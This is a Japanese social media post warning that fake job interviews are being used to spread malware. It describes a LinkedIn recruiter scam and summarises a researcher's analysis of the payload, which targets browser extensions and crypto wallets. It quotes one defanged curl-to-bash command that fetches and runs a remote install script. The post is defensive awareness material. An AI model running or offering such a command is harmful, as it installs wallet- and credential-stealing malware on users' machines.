偽の求人面接に注意してください。彼らは今や最もクリーンなマルウェア配信経路の一つです。

今週、私の兄もほとんど被害に遭いそうになりました。
手順を追って説明します：
> 「リクルーター」がLinkedInで彼に連絡を取る
> 実際に彼の履歴書を読んでおり、彼の技術スタックを把握している。彼らは本物の面接時間を予約する。
> 通話の数時間前：「ちょっとだけ、私たちの製品ページを確認してもらえますか？」
> サイトにアクセスすると、バックグラウンドでこれが実行される：
curl -s macos[.]hyperhives[.]net/install | nohup bash &
パスワードを求められたら入力すると終わりです。
リバースエンジニアリングを行ったGithubの(Darksp33d研究者によると：
> すべての設定文字列は570のユニークなカスタム関数で暗号化されている
> 解読後：完全なC2サーバー、エンドポイントリスト、そして開発者に法的召喚状が出ているセントリーエラー追跡用DSNが含まれる
> 276のターゲットとなったChrome拡張ID、188の暗号通貨ウォレットをカバー
> DPRKの「感染性面接」とのTTPの重複が強い
> VirusTotalでは9/64。CrowdStrike、Sophos、Malwarebytesはすべて見逃している
本物のリクルーター、本物の履歴書、本物の面接時間、本物のように見えるサイト。1行のcurlコマンドであなたのウォレットを奪われる。
もし「リクルーター」があなたに端末で何かを実行させようとしたら、たとえそれがビルドスクリプトのような無害なものであっても、タブを閉じてください。